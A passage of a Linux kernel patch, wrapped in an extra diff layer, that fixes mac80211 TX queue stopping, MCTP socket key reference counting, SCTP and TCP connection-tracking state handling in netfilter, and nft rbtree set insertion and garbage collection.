+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index de7b8a4d4bbbb..a8862f2c64ec0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -836,7 +836,7 @@ enum txq_info_flags {
+ 	IEEE80211_TXQ_STOP,
+ 	IEEE80211_TXQ_AMPDU,
+ 	IEEE80211_TXQ_NO_AMSDU,
+-	IEEE80211_TXQ_STOP_NETIF_TX,
++	IEEE80211_TXQ_DIRTY,
+ };
+ 
+ /**
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index cc10ee1ff8e93..6409097a56c7a 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -1295,7 +1295,8 @@ ieee80211_tx_prepare(struct ieee80211_sub_if_data *sdata,
+ 	if (!(info->flags & IEEE80211_TX_CTL_DONTFRAG)) {
+ 		if (!(tx->flags & IEEE80211_TX_UNICAST) ||
+ 		    skb->len + FCS_LEN <= local->hw.wiphy->frag_threshold ||
+-		    info->flags & IEEE80211_TX_CTL_AMPDU)
++		    (info->flags & IEEE80211_TX_CTL_AMPDU &&
++		     !local->ops->wake_tx_queue))
+ 			info->flags |= IEEE80211_TX_CTL_DONTFRAG;
+ 	}
+ 
+@@ -3709,13 +3710,15 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	struct ieee80211_local *local = hw_to_local(hw);
+ 	struct txq_info *txqi = container_of(txq, struct txq_info, txq);
+ 	struct ieee80211_hdr *hdr;
+-	struct sk_buff *skb = NULL;
+ 	struct fq *fq = &local->fq;
+ 	struct fq_tin *tin = &txqi->tin;
+ 	struct ieee80211_tx_info *info;
+ 	struct ieee80211_tx_data tx;
++	struct sk_buff *skb;
+ 	ieee80211_tx_result r;
+ 	struct ieee80211_vif *vif = txq->vif;
++	int q = vif->hw_queue[txq->ac];
++	bool q_stopped;
+ 
+ 	WARN_ON_ONCE(softirq_count() == 0);
+ 
+@@ -3723,17 +3726,18 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 		return NULL;
+ 
+ begin:
+-	spin_lock_bh(&fq->lock);
++	spin_lock(&local->queue_stop_reason_lock);
++	q_stopped = local->queue_stop_reasons[q];
++	spin_unlock(&local->queue_stop_reason_lock);
+ 
+-	if (test_bit(IEEE80211_TXQ_STOP, &txqi->flags) ||
+-	    test_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags))
+-		goto out;
+-
+-	if (vif->txqs_stopped[txq->ac]) {
+-		set_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags);
+-		goto out;
++	if (unlikely(q_stopped)) {
++		/* mark for waking later */
++		set_bit(IEEE80211_TXQ_DIRTY, &txqi->flags);
++		return NULL;
+ 	}
+ 
++	spin_lock_bh(&fq->lock);
++
+ 	/* Make sure fragments stay together. */
+ 	skb = __skb_dequeue(&txqi->frags);
+ 	if (unlikely(skb)) {
+@@ -3743,6 +3747,9 @@ begin:
+ 		IEEE80211_SKB_CB(skb)->control.flags &=
+ 			~IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
+ 	} else {
++		if (unlikely(test_bit(IEEE80211_TXQ_STOP, &txqi->flags)))
++			goto out;
++
+ 		skb = fq_tin_dequeue(fq, tin, fq_tin_dequeue_func);
+ 	}
+ 
+@@ -3793,7 +3800,8 @@ begin:
+ 	}
+ 
+ 	if (test_bit(IEEE80211_TXQ_AMPDU, &txqi->flags))
+-		info->flags |= IEEE80211_TX_CTL_AMPDU;
++		info->flags |= (IEEE80211_TX_CTL_AMPDU |
++				IEEE80211_TX_CTL_DONTFRAG);
+ 	else
+ 		info->flags &= ~IEEE80211_TX_CTL_AMPDU;
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index b512cb37aafb7..ed53c51bbc321 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -301,8 +301,6 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 	local_bh_disable();
+ 	spin_lock(&fq->lock);
+ 
+-	sdata->vif.txqs_stopped[ac] = false;
+-
+ 	if (!test_bit(SDATA_STATE_RUNNING, &sdata->state))
+ 		goto out;
+ 
+@@ -324,7 +322,7 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 			if (ac != txq->ac)
+ 				continue;
+ 
+-			if (!test_and_clear_bit(IEEE80211_TXQ_STOP_NETIF_TX,
++			if (!test_and_clear_bit(IEEE80211_TXQ_DIRTY,
+ 						&txqi->flags))
+ 				continue;
+ 
+@@ -339,7 +337,7 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 
+ 	txqi = to_txq_info(vif->txq);
+ 
+-	if (!test_and_clear_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags) ||
++	if (!test_and_clear_bit(IEEE80211_TXQ_DIRTY, &txqi->flags) ||
+ 	    (ps && atomic_read(&ps->num_sta_ps)) || ac != vif->txq->ac)
+ 		goto out;
+ 
+@@ -537,16 +535,10 @@ static void __ieee80211_stop_queue(struct ieee80211_hw *hw, int queue,
+ 			continue;
+ 
+ 		for (ac = 0; ac < n_acs; ac++) {
+-			if (sdata->vif.hw_queue[ac] == queue ||
+-			    sdata->vif.cab_queue == queue) {
+-				if (!local->ops->wake_tx_queue) {
+-					netif_stop_subqueue(sdata->dev, ac);
+-					continue;
+-				}
+-				spin_lock(&local->fq.lock);
+-				sdata->vif.txqs_stopped[ac] = true;
+-				spin_unlock(&local->fq.lock);
+-			}
++			if (!local->ops->wake_tx_queue &&
++			    (sdata->vif.hw_queue[ac] == queue ||
++			     sdata->vif.cab_queue == queue))
++				netif_stop_subqueue(sdata->dev, ac);
+ 		}
+ 	}
+ 	rcu_read_unlock();
+diff --git a/net/mctp/af_mctp.c b/net/mctp/af_mctp.c
+index fc9e728b6333a..45bbe3e54cc28 100644
+--- a/net/mctp/af_mctp.c
++++ b/net/mctp/af_mctp.c
+@@ -544,9 +544,6 @@ static int mctp_sk_init(struct sock *sk)
+ 
+ static void mctp_sk_close(struct sock *sk, long timeout)
+ {
+-	struct mctp_sock *msk = container_of(sk, struct mctp_sock, sk);
+-
+-	del_timer_sync(&msk->key_expiry);
+ 	sk_common_release(sk);
+ }
+ 
+@@ -580,7 +577,14 @@ static void mctp_sk_unhash(struct sock *sk)
+ 		spin_lock_irqsave(&key->lock, fl2);
+ 		__mctp_key_remove(key, net, fl2, MCTP_TRACE_KEY_CLOSED);
+ 	}
++	sock_set_flag(sk, SOCK_DEAD);
+ 	spin_unlock_irqrestore(&net->mctp.keys_lock, flags);
++
++	/* Since there are no more tag allocations (we have removed all of the
++	 * keys), stop any pending expiry events. the timer cannot be re-queued
++	 * as the sk is no longer observable
++	 */
++	del_timer_sync(&msk->key_expiry);
+ }
+ 
+ static struct proto mctp_proto = {
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index f9a80b82dc511..f51a05ec71624 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -147,6 +147,7 @@ static struct mctp_sk_key *mctp_key_alloc(struct mctp_sock *msk,
+ 	key->valid = true;
+ 	spin_lock_init(&key->lock);
+ 	refcount_set(&key->refs, 1);
++	sock_hold(key->sk);
+ 
+ 	return key;
+ }
+@@ -165,6 +166,7 @@ void mctp_key_unref(struct mctp_sk_key *key)
+ 	mctp_dev_release_key(key->dev, key);
+ 	spin_unlock_irqrestore(&key->lock, flags);
+ 
++	sock_put(key->sk);
+ 	kfree(key);
+ }
+ 
+@@ -177,6 +179,11 @@ static int mctp_key_add(struct mctp_sk_key *key, struct mctp_sock *msk)
+ 
+ 	spin_lock_irqsave(&net->mctp.keys_lock, flags);
+ 
++	if (sock_flag(&msk->sk, SOCK_DEAD)) {
++		rc = -EINVAL;
++		goto out_unlock;
++	}
++
+ 	hlist_for_each_entry(tmp, &net->mctp.keys, hlist) {
+ 		if (mctp_key_match(tmp, key->local_addr, key->peer_addr,
+ 				   key->tag)) {
+@@ -198,6 +205,7 @@ static int mctp_key_add(struct mctp_sk_key *key, struct mctp_sock *msk)
+ 		hlist_add_head(&key->sklist, &msk->keys);
+ 	}
+ 
++out_unlock:
+ 	spin_unlock_irqrestore(&net->mctp.keys_lock, flags);
+ 
+ 	return rc;
+@@ -315,8 +323,8 @@ static int mctp_frag_queue(struct mctp_sk_key *key, struct sk_buff *skb)
+ 
+ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ {
++	struct mctp_sk_key *key, *any_key = NULL;
+ 	struct net *net = dev_net(skb->dev);
+-	struct mctp_sk_key *key;
+ 	struct mctp_sock *msk;
+ 	struct mctp_hdr *mh;
+ 	unsigned long f;
+@@ -361,13 +369,11 @@ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ 			 * key for reassembly - we'll create a more specific
+ 			 * one for future packets if required (ie, !EOM).
+ 			 */
+-			key = mctp_lookup_key(net, skb, MCTP_ADDR_ANY, &f);
+-			if (key) {
+-				msk = container_of(key->sk,
++			any_key = mctp_lookup_key(net, skb, MCTP_ADDR_ANY, &f);
++			if (any_key) {
++				msk = container_of(any_key->sk,
+ 						   struct mctp_sock, sk);
+-				spin_unlock_irqrestore(&key->lock, f);
+-				mctp_key_unref(key);
+-				key = NULL;
++				spin_unlock_irqrestore(&any_key->lock, f);
+ 			}
+ 		}
+ 
+@@ -419,14 +425,14 @@ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ 			 * this function.
+ 			 */
+ 			rc = mctp_key_add(key, msk);
+-			if (rc) {
+-				kfree(key);
+-			} else {
++			if (!rc)
+ 				trace_mctp_key_acquire(key);
+ 
+-				/* we don't need to release key->lock on exit */
+-				mctp_key_unref(key);
+-			}
++			/* we don't need to release key->lock on exit, so
++			 * clean up here and suppress the unlock via
++			 * setting to NULL
++			 */
++			mctp_key_unref(key);
+ 			key = NULL;
+ 
+ 		} else {
+@@ -473,6 +479,8 @@ out_unlock:
+ 		spin_unlock_irqrestore(&key->lock, f);
+ 		mctp_key_unref(key);
+ 	}
++	if (any_key)
++		mctp_key_unref(any_key);
+ out:
+ 	if (rc)
+ 		kfree_skb(skb);
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 5a936334b517a..895e0ca542994 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -27,22 +27,16 @@
+ #include <net/netfilter/nf_conntrack_ecache.h>
+ #include <net/netfilter/nf_conntrack_timeout.h>
+ 
+-/* FIXME: Examine ipfilter's timeouts and conntrack transitions more
+-   closely.  They're more complex. --RR
+-
+-   And so for me for SCTP :D -Kiran */
+-
+ static const char *const sctp_conntrack_names[] = {
+-	"NONE",
+-	"CLOSED",
+-	"COOKIE_WAIT",
+-	"COOKIE_ECHOED",
+-	"ESTABLISHED",
+-	"SHUTDOWN_SENT",
+-	"SHUTDOWN_RECD",
+-	"SHUTDOWN_ACK_SENT",
+-	"HEARTBEAT_SENT",
+-	"HEARTBEAT_ACKED",
++	[SCTP_CONNTRACK_NONE]			= "NONE",
++	[SCTP_CONNTRACK_CLOSED]			= "CLOSED",
++	[SCTP_CONNTRACK_COOKIE_WAIT]		= "COOKIE_WAIT",
++	[SCTP_CONNTRACK_COOKIE_ECHOED]		= "COOKIE_ECHOED",
++	[SCTP_CONNTRACK_ESTABLISHED]		= "ESTABLISHED",
++	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= "SHUTDOWN_SENT",
++	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= "SHUTDOWN_RECD",
++	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= "SHUTDOWN_ACK_SENT",
++	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= "HEARTBEAT_SENT",
+ };
+ 
+ #define SECS  * HZ
+@@ -54,12 +48,11 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ 	[SCTP_CONNTRACK_CLOSED]			= 10 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_WAIT]		= 3 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_ECHOED]		= 3 SECS,
+-	[SCTP_CONNTRACK_ESTABLISHED]		= 5 DAYS,
++	[SCTP_CONNTRACK_ESTABLISHED]		= 210 SECS,
+ 	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 300 SECS / 1000,
+ 	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 300 SECS / 1000,
+ 	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= 3 SECS,
+ 	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= 30 SECS,
+-	[SCTP_CONNTRACK_HEARTBEAT_ACKED]	= 210 SECS,
+ };
+ 
+ #define	SCTP_FLAG_HEARTBEAT_VTAG_FAILED	1
+@@ -73,7 +66,6 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ #define	sSR SCTP_CONNTRACK_SHUTDOWN_RECD
+ #define	sSA SCTP_CONNTRACK_SHUTDOWN_ACK_SENT
+ #define	sHS SCTP_CONNTRACK_HEARTBEAT_SENT
+-#define	sHA SCTP_CONNTRACK_HEARTBEAT_ACKED
+ #define	sIV SCTP_CONNTRACK_MAX
+ 
+ /*
+@@ -96,9 +88,6 @@ SHUTDOWN_ACK_SENT - We have seen a SHUTDOWN_ACK chunk in the direction opposite
+ CLOSED            - We have seen a SHUTDOWN_COMPLETE chunk in the direction of
+ 		    the SHUTDOWN chunk. Connection is closed.
+ HEARTBEAT_SENT    - We have seen a HEARTBEAT in a new flow.
+-HEARTBEAT_ACKED   - We have seen a HEARTBEAT-ACK in the direction opposite to
+-		    that of the HEARTBEAT chunk. Secondary connection is
+-		    established.
+ */
+ 
+ /* TODO
+@@ -115,33 +104,33 @@ cookie echoed to closed.
+ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ 	{
+ /*	ORIGINAL	*/
+-/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA */
+-/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW, sHA},
+-/* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},
+-/* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
+-/* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL, sSS},
+-/* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA, sHA},
+-/* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* Can't have Stale cookie*/
+-/* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* 5.2.4 - Big TODO */
+-/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* Can't come in orig dir */
+-/* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL, sHA},
+-/* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA},
+-/* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA}
++/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
++/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW},
++/* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},
++/* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
++/* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL},
++/* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA},
++/* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't have Stale cookie*/
++/* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL},/* 5.2.4 - Big TODO */
++/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
++/* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL},
++/* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
++/* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+ 	},
+ 	{
+ /*	REPLY	*/
+-/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA */
+-/* init         */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},/* INIT in sCL Big TODO */
+-/* init_ack     */ {sIV, sCW, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},
+-/* abort        */ {sIV, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sIV, sCL},
+-/* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV, sSR},
+-/* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV, sHA},
+-/* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV, sHA},
+-/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},/* Can't come in reply dir */
+-/* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV, sHA},
+-/* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV, sHA},
+-/* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA},
+-/* heartbeat_ack*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHA, sHA}
++/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
++/* init         */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* INIT in sCL Big TODO */
++/* init_ack     */ {sIV, sCW, sCW, sCE, sES, sSS, sSR, sSA, sIV},
++/* abort        */ {sIV, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sIV},
++/* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV},
++/* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV},
++/* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV},
++/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
++/* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV},
++/* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV},
++/* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
++/* heartbeat_ack*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sES},
+ 	}
+ };
+ 
+@@ -412,22 +401,29 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 	for_each_sctp_chunk (skb, sch, _sch, offset, dataoff, count) {
+ 		/* Special cases of Verification tag check (Sec 8.5.1) */
+ 		if (sch->type == SCTP_CID_INIT) {
+-			/* Sec 8.5.1 (A) */
++			/* (A) vtag MUST be zero */
+ 			if (sh->vtag != 0)
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_ABORT) {
+-			/* Sec 8.5.1 (B) */
+-			if (sh->vtag != ct->proto.sctp.vtag[dir] &&
+-			    sh->vtag != ct->proto.sctp.vtag[!dir])
++			/* (B) vtag MUST match own vtag if T flag is unset OR
++			 * MUST match peer's vtag if T flag is set
++			 */
++			if ((!(sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[dir]) ||
++			    ((sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[!dir]))
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_SHUTDOWN_COMPLETE) {
+-			/* Sec 8.5.1 (C) */
+-			if (sh->vtag != ct->proto.sctp.vtag[dir] &&
+-			    sh->vtag != ct->proto.sctp.vtag[!dir] &&
+-			    sch->flags & SCTP_CHUNK_FLAG_T)
++			/* (C) vtag MUST match own vtag if T flag is unset OR
++			 * MUST match peer's vtag if T flag is set
++			 */
++			if ((!(sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[dir]) ||
++			    ((sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[!dir]))
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_COOKIE_ECHO) {
+-			/* Sec 8.5.1 (D) */
++			/* (D) vtag must be same as init_vtag as found in INIT_ACK */
+ 			if (sh->vtag != ct->proto.sctp.vtag[dir])
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_HEARTBEAT) {
+@@ -501,8 +497,12 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 		}
+ 
+ 		ct->proto.sctp.state = new_state;
+-		if (old_state != new_state)
++		if (old_state != new_state) {
+ 			nf_conntrack_event_cache(IPCT_PROTOINFO, ct);
++			if (new_state == SCTP_CONNTRACK_ESTABLISHED &&
++			    !test_and_set_bit(IPS_ASSURED_BIT, &ct->status))
++				nf_conntrack_event_cache(IPCT_ASSURED, ct);
++		}
+ 	}
+ 	spin_unlock_bh(&ct->lock);
+ 
+@@ -516,14 +516,6 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 
+ 	nf_ct_refresh_acct(ct, ctinfo, skb, timeouts[new_state]);
+ 
+-	if (old_state == SCTP_CONNTRACK_COOKIE_ECHOED &&
+-	    dir == IP_CT_DIR_REPLY &&
+-	    new_state == SCTP_CONNTRACK_ESTABLISHED) {
+-		pr_debug("Setting assured bit\n");
+-		set_bit(IPS_ASSURED_BIT, &ct->status);
+-		nf_conntrack_event_cache(IPCT_ASSURED, ct);
+-	}
+-
+ 	return NF_ACCEPT;
+ 
+ out_unlock:
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index 6566310831779..3ac1af6f59fcc 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -1068,6 +1068,13 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct,
+ 				ct->proto.tcp.last_flags |=
+ 					IP_CT_EXP_CHALLENGE_ACK;
+ 		}
++
++		/* possible challenge ack reply to syn */
++		if (old_state == TCP_CONNTRACK_SYN_SENT &&
++		    index == TCP_ACK_SET &&
++		    dir == IP_CT_DIR_REPLY)
++			ct->proto.tcp.last_ack = ntohl(th->ack_seq);
++
+ 		spin_unlock_bh(&ct->lock);
+ 		nf_ct_l4proto_log_invalid(skb, ct, state,
+ 					  "packet (index %d) in dir %d ignored, state %s",
+@@ -1193,6 +1200,14 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct,
+ 			 * segments we ignored. */
+ 			goto in_window;
+ 		}
++
++		/* Reset in response to a challenge-ack we let through earlier */
++		if (old_state == TCP_CONNTRACK_SYN_SENT &&
++		    ct->proto.tcp.last_index == TCP_ACK_SET &&
++		    ct->proto.tcp.last_dir == IP_CT_DIR_REPLY &&
++		    ntohl(th->seq) == ct->proto.tcp.last_ack)
++			goto in_window;
++
+ 		break;
+ 	default:
+ 		/* Keep compilers happy. */
+diff --git a/net/netfilter/nf_conntrack_standalone.c b/net/netfilter/nf_conntrack_standalone.c
+index bca839ab1ae8d..460294bd4b606 100644
+--- a/net/netfilter/nf_conntrack_standalone.c
++++ b/net/netfilter/nf_conntrack_standalone.c
+@@ -601,7 +601,6 @@ enum nf_ct_sysctl_index {
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_SHUTDOWN_RECD,
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_SHUTDOWN_ACK_SENT,
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_SENT,
+-	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_ACKED,
+ #endif
+ #ifdef CONFIG_NF_CT_PROTO_DCCP
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_DCCP_REQUEST,
+@@ -886,12 +885,6 @@ static struct ctl_table nf_ct_sysctl_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_jiffies,
+ 	},
+-	[NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_ACKED] = {
+-		.procname       = "nf_conntrack_sctp_timeout_heartbeat_acked",
+-		.maxlen         = sizeof(unsigned int),
+-		.mode           = 0644,
+-		.proc_handler   = proc_dointvec_jiffies,
+-	},
+ #endif
+ #ifdef CONFIG_NF_CT_PROTO_DCCP
+ 	[NF_SYSCTL_CT_PROTO_TIMEOUT_DCCP_REQUEST] = {
+@@ -1035,7 +1028,6 @@ static void nf_conntrack_standalone_init_sctp_sysctl(struct net *net,
+ 	XASSIGN(SHUTDOWN_RECD, sn);
+ 	XASSIGN(SHUTDOWN_ACK_SENT, sn);
+ 	XASSIGN(HEARTBEAT_SENT, sn);
+-	XASSIGN(HEARTBEAT_ACKED, sn);
+ #undef XASSIGN
+ #endif
+ }
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 7325bee7d1442..19ea4d3c35535 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -38,10 +38,12 @@ static bool nft_rbtree_interval_start(const struct nft_rbtree_elem *rbe)
+ 	return !nft_rbtree_interval_end(rbe);
+ }
+ 
+-static bool nft_rbtree_equal(const struct nft_set *set, const void *this,
+-			     const struct nft_rbtree_elem *interval)
++static int nft_rbtree_cmp(const struct nft_set *set,
++			  const struct nft_rbtree_elem *e1,
++			  const struct nft_rbtree_elem *e2)
+ {
+-	return memcmp(this, nft_set_ext_key(&interval->ext), set->klen) == 0;
++	return memcmp(nft_set_ext_key(&e1->ext), nft_set_ext_key(&e2->ext),
++		      set->klen);
+ }
+ 
+ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set,
+@@ -52,7 +54,6 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 	const struct nft_rbtree_elem *rbe, *interval = NULL;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const struct rb_node *parent;
+-	const void *this;
+ 	int d;
+ 
+ 	parent = rcu_dereference_raw(priv->root.rb_node);
+@@ -62,12 +63,11 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 
+ 		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
+ 
+-		this = nft_set_ext_key(&rbe->ext);
+-		d = memcmp(this, key, set->klen);
++		d = memcmp(nft_set_ext_key(&rbe->ext), key, set->klen);
+ 		if (d < 0) {
+ 			parent = rcu_dereference_raw(parent->rb_left);
+ 			if (interval &&
+-			    nft_rbtree_equal(set, this, interval) &&
++			    !nft_rbtree_cmp(set, rbe, interval) &&
+ 			    nft_rbtree_interval_end(rbe) &&
+ 			    nft_rbtree_interval_start(interval))
+ 				continue;
+@@ -215,154 +215,216 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 	return rbe;
+ }
+ 
++static int nft_rbtree_gc_elem(const struct nft_set *__set,
++			      struct nft_rbtree *priv,
++			      struct nft_rbtree_elem *rbe)
++{
++	struct nft_set *set = (struct nft_set *)__set;
++	struct rb_node *prev = rb_prev(&rbe->node);
++	struct nft_rbtree_elem *rbe_prev;
++	struct nft_set_gc_batch *gcb;
++
++	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
++	if (!gcb)
++		return -ENOMEM;
++
++	/* search for expired end interval coming before this element. */
++	do {
++		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++		if (nft_rbtree_interval_end(rbe_prev))
++			break;
++
++		prev = rb_prev(prev);
++	} while (prev != NULL);
++
++	rb_erase(&rbe_prev->node, &priv->root);
++	rb_erase(&rbe->node, &priv->root);
++	atomic_sub(2, &set->nelems);
++
++	nft_set_gc_batch_add(gcb, rbe);
++	nft_set_gc_batch_complete(gcb);
++
++	return 0;
++}
++
++static bool nft_rbtree_update_first(const struct nft_set *set,
++				    struct nft_rbtree_elem *rbe,
++				    struct rb_node *first)
++{
++	struct nft_rbtree_elem *first_elem;
++
++	first_elem = rb_entry(first, struct nft_rbtree_elem, node);
++	/* this element is closest to where the new element is to be inserted:
++	 * update the first element for the node list path.
++	 */
++	if (nft_rbtree_cmp(set, rbe, first_elem) < 0)
++		return true;
++
++	return false;
++}
++
+ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 			       struct nft_rbtree_elem *new,
+ 			       struct nft_set_ext **ext)
+ {
+-	bool overlap = false, dup_end_left = false, dup_end_right = false;
++	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
++	struct rb_node *node, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 genmask = nft_genmask_next(net);
+-	struct nft_rbtree_elem *rbe;
+-	struct rb_node *parent, **p;
+-	int d;
++	int d, err;
+ 
+-	/* Detect overlaps as we descend the tree. Set the flag in these cases:
+-	 *
